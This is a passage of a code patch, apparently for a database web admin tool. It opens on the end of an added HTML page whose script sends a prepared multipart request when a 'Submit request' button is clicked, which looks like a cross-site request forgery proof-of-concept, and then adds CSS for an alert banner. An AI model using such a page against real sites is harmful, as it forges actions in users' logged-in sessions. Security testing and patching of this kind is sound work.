+ "-----------------------------297112967428312--\r\n";
+ var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++)
+ aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody]));
+ }
+</script>
+<form action="#">
+ <input type="button" value="Submit request" onclick="submitRequest();" />
+</form>
+</body>
+</html>
Index: themes/global.css
===================================================================
--- themes/global.css.orig
+++ themes/global.css
@@ -72,6 +72,26 @@ body.browser {
}
.ac_values {width:100%}
+/** alert banner **/
+.alert-banner {
+ background-color: #FEEFB3;
+ border: 1px dotted #9F6000;
+ color: #9F6000;
+ padding: 4px;
+ margin: 4px 0;
+}
+.alert-banner p {
+ margin: 0;
+ padding: 0;
+}
+.alert-banner p:before {
+ content: url(../../images/themes/default/ObjectNotFound.png);
+ vertical-align: -20%;
+}
+.alert-banner p a {
+ color: #9F6000;
+}
+
/** bottom link back to top **/
.bottom_link {
position: fixed;
Index: themes/gotar/global.css
===================================================================
--- themes/gotar/global.css.orig
+++ themes/gotar/global.css
@@ -136,6 +136,7 @@ td.opbutton1 a, td.opbutton2 a {
padding-left:6px;
padding-right:6px;
}
+.alert-banner { margin-top: 0 }
.topbar { border: 0 }
.topbar, .topbar *, .trail, .tab, .crumb {
border: 0;